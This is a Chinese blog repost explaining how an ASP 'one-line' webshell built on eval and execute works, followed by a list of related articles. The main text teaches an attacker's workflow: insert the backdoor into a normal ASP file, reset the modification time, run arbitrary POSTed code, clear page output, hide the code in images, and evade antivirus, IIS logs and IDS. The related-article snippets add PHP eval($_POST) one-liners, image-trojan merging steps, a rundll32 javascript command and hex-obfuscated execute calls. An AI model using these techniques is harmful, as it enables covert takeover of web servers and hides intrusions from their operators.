Eval版ASP木马原理解析《来自剑客山庄》

最新推荐文章于 2021-08-20 10:53:20 发布
最新推荐文章于 2021-08-20 10:53:20 发布
阅读量1k 收藏
点赞数
文章标签: asp vbscript javascript 杀毒软件 session iis
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jian436/article/details/6489627
版权

说实话, 我没看明白,不过慢慢看咯(真的是ASP哦)。呵呵

先管理员防范WebShell的技术也有所提高,以前那种直接放上一个WebShell的时代离我们而去了,现在的WebShell越来越注重隐蔽性。WebShell的隐藏技术也发展得很快,从改变代码大小写  
到C/S模式,都是牛人们智慧的结晶。说到C/S模式,是不是让你想起ASP下那个"Execute Request("#")"一句话  
后门,呵呵,今天我也跟大家介绍一个ASP一句话后门,不过不是execute,而是另一个函数——eval。  
嗯,先来说说eval后门的原理和使用方法,不会的听仔细啦。偶们知道在asp里面有个execute函数专门用  
来执行asp代码,这个就类似于Javascript里面的eval函数。所以execute就可以拿来做成一  
句话后门:execute request("x")。不过,当POST的参数x为空时execute函数会出错,所以你得加一  
句容错语句才是。其实VBScript里面也有eval函数的,不知道能不能拿来用,嗯,看看它功能先:  

Eval函数   
计算一个表达式的值并返回结果。  

[result = ] Eval(expression)   
参数   
result   
可选项。 是一个变量,用于接受返回的结果。如果未指定结果,应考虑使用 Execute 语句代替。  

expression   
必选项。可以是包含任何有效VBScript表达式的字符串。  

小提示:   
在VBScript 中,x = y可以有两种解释。第一种方式是赋值语句,将y的值赋予x。第二种解释  
是测试x 和y是否相等。如果相等,result为True;否则result为False。Eval方法总是采用第  
二种解释,而Execute语句总是采用第一种。   
注意,参数expression"可以是包含任何有效VBScript表达式的字符串"。呵呵,那不就是暗示  
我们eval能执行任意代码嘛。不过看那个说明,eval总是把赋值语句解释成判断句,岂不是不能  
拿来赋值。呵呵,不要紧,如果我们拿eval来执行execute再由execute执行任意代码呢?  
呵呵,eval后门诞生了!   
同execute相比,eval有个好处就是当参数为空不会出错,所以迄今为止最短的ASP后门就是""。数数吧,  
是不是比以前的都短啊,呵呵。   
把eval函数插入到一正常的ASP文件,你的后门就留好了(如果能够把文件最后修改时间改回去就更好了)  
。现在可以执行任意代码了,当然,代码需要你用客户端POST上去。   
客户端用网页实现很是方便。海阳顶端有个eval客户端,好像是用session保存代码然后执行,不过我试了几  
次都不行,唉,还是自己写一个吧。   
我做的这个客户端与海阳的不同,是由各个功能分别构成,每个功能使用一个htm页面,对应一段代码,放在  
网页的隐藏域。参考了冰狐浪子那个微型ASP后门客户端的网页结构,感谢之。   
先前不是说了,我们得用eval执行execute再由execute执行代码。所以隐藏域的内容类  
似于"execute("response.write(""Hello , World !""):response.write(""   
"")"——注意在引号之中的引号得双写;而且execute中的字符可以使用回车换行也可以用冒  
号代替回车换行。   
这样子还不够,我们还要"斩头去尾"。斩头呢就是把我们的后门代码执行之前的数据清空,去  
尾呢就是把后门执行代码之后的数据清空,不能让其他无用数据影响我们看回显嘛。  
这个分别用response.clear和response.end来完成。Ok,经过一番斩头去尾,我们的隐藏  
域就成了:"resposne.clear:execute("response.write(""Hello, World!""):response.write(""   
""):response.end")"。   
这里顺便说一下,去年不是有牛人提出用#i nclude一图片的形式来隐藏后门,图片最后  
是一段asp代码。当时不是说这个方法执行代码之后会显示图片而没有回显吗,其实是有回显的  
,你把图片保存后用十六进制编辑软件打开,原来回显内容在图片末尾。呵呵,想到  
了吧,用response.clear就可以清除图片显示出回显啦。   
现在的任务就是找点ASP后门的代码改动改动再结合Javascript做成html文件就是了,有  
兴趣的朋友看代码,在此就不赘述咯。另外,execute函数也可以使用这个客户端的哦。   
这种后门的优点就是体积小,隐蔽性高,杀毒软件不能查杀,而且所有提交的数据  
都是POST方式,IIS日志不会记录;缺点是每次执行代码都会有大量数据传送,而且代码通过execute执行速度会慢些。   
这种执行代码还有一个好处就是可以把POST的代码加密,绕过IDS,呵呵,这个嘛以后再说咯 
jian436
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
冰狐浪子微型ASP后门客户端 v2.0 测试 -ASP源码.zip
12-13
ASP源码,压缩包解压密码:www.cqlsoft.com
渗透之——asp图片木马的制作和使用
冰河的专栏
12-11 1万+
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/84959588 主要亮点:图片木马(可以正常打开显示的木马) 先看代码: 仅需几步:图片和一句话木马合并,制作可以正常显示的图片木马。 1、找一张图片,名字改成1.jpg 2、<%eval request(“a”)%>存为1.asp(就是一句话木马) 3、copy ...
网管笔记35:不得不看的黑客工具集
柏图
11-26 2万+
一、注入攻击工具 1、啊D注入工具破解 http://www.uushare.com/user/hackerxfiles/file/959569 2、Domain3.5干净本 http://www.uushare.com/user/hackerxfiles/file/959573 3、GetWebshellah56bug大众 http://www.uus
EvalASP木马
asp经验积累
02-16 624
EvalASP木马说到C/S模式,是不是让你想起ASP下那个“Execute Request("#")”一句话后门,呵呵,今天我也跟大家介绍一个ASP一句话后门,不过不是execute,而是另一个函数——eval。 嗯,先来说说eval后门的原理和使用方法,不会的听仔细啦。偶们知道在asp里面有个execute函数专门用来执行asp代码,这个就类似于Javascript里面的eval函数。所以e
Web安全-一句话木马
liuwei0376的专栏
08-20 3831
概述 在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢? 先来看看最简单的一句话木马: <?php @eval($_POST['attack']);?> 【基本原理】利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以在本地通过中国菜刀 chopper.exe 即可获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()函数表示括号内的语
asp防止上传图片木马原理解析
10-23
有时候通过程序上传木马,一般都是伪装成图片,下面是asp下检测图片木马的代码,需要的朋友可以参考下。
一句话 asp木马加密 彻底突破杀毒软件
01-02
不知道怎样表达清楚。看例子吧: 代码如下:[removed] Execute(HextoStr(“65786563757465287265717565737428636872283335292929”)) Function HextoStr(data) HextoStr=”EXECUTE “”””” C=”&CHR(&H” N...
隐藏ASP木马后门的两种方法
01-20
1、建立非标准目录:mkdir images..\ 拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp 通过web访问ASP木马:http://ip/images../news.asp?action=login 如何删除非...
ASP下检测图片木马的函数代码
01-02
木马原理:入侵者使用诸如ASP图片木马生成器之类的工具将一张正常的图片与一个ASP木马文件合并成一个图片文件(即将对网站有害的 ASP代码插在图片编码之后,虽然图片仍然可以正常显示,但是文件内容和尺寸已被改变)...
PHP常见代码执行后门函数(例如eval和assert)
美奇软件开发工作室
04-23 5460
什么是代码执行: 应用程序在调用一些能够将字符串转换为代码的函数(例如php中的eval中),没有考虑用户是否控制这个字符串,将造成代码执行漏洞。 常见php代码执行函数介绍 常用执行代码函数 1、eval(): <?php @eval($_POST['hacker']); ?> eval函数将接受的字符串当做代码执行 2、 assert(): 用法和 eval()...
php后门绕过eval关键字,一些变态的PHP一句话后门收集
weixin_42181929的博客
03-18 1736
这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。利用404页面隐藏PHP小马404 Not FoundNot FoundThe requested URL was not found on this server.@preg_replace("/[pageerror]/e",$_...
eval一句话木马原理详解
blackbean的专栏
08-19 1801
http://wenku.baidu.com/view/38795d1910a6f524ccbf8591.html
eval函数简介与PHP一句话木马剖析
对代码不满足,是任何真正有天才的程序员的根本特征。
01-29 2万+
eval函数简介与PHP一句话木马剖析    大家好我是Carol,我的QQ是:906871417 一:eval函数 二:eval函数的一般用法 三:eval函数的特殊用法 四:php一句话挂马的原理 五:禁用eval函数   一:eval函数 1.eval() 函数把字符串按照 PHP 代码来计算。 2.该
php eval运行脚本,一句话SHELL,超级大后门
marsdata的博客
08-31 588
function CLASSX($clsid){if (strpos("xxx"._post("clsadd"),$clsid."/")>0){$clsxyz="";$clsrst="";}else{$clsrst=SX("select funfull,oldfull from coode_phpcls where funname='".$clsid."' or funname='".$clsid."()'");$totcls=countresult($clsrst);if (intval($tot
利用Javascript做后门的利用方式
KHOST的博客
03-16 1955
//Execute A Command rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("calc"); //Write To A File rundll32.exe javascript:"\..\m...
PHP页面被加入eval(base64_decode后门怎么办
weixin_34290631的博客
08-13 1211
1. 空间下站点所有的php文件头部都被加了“eval(base64_decode”这么一段,不论用的是什么程序(有dede,有wp,有zencart)。访问网站时会弹出什么你的电脑有问题,要用注册表啦,然后不停的弹出扫描窗口要你付费购买或者就是一片空白什么都没有。 2. 手动清除index.php里的这段代码后,过几个小时他又会自动出来。 3. index.php文件的...
ASPX一句话木马--终极&详细分析(ASP-EXECUTE VS ASPX-EVAL)
热门推荐
Quantum Intelligence
08-04 5万+
首先回顾一下以前ASP一句话的经典木马吧!"" then execute request("nonamed")%>VBS中execute就是动态运行指定的代码而JSCRIPT中也同样有eval函数可以实现,也就是说ASP一句话木马也有个本是采用JSCRIPT的 eval的!网上也有例子我就不多说了!.....然后解析语言终究发展成为中间代码例如java .net  动态执行也就不存在
php超小免杀大马_超小PHP小马小结(方便查找后门的朋友)免杀
weixin_39579483的博客
12-30 824
作者: spider我也来个超小PHP小马复制代码 代码如下:header("content-Type: text/html; charset=gb2312");if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v);?>保存文件名: if(isset($_POST['file...
asp.net eval方法
最新发布
09-19
ASP.NET Eval方法是一种数据绑定函数,用于在ASP.NET网页中将数据绑定到控件上。它允许开发人员在网页中使用表达式来动态地获取和显示数据。Eval方法通过提供一个表达式,然后通过将该表达式应用于数据源中的每个...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值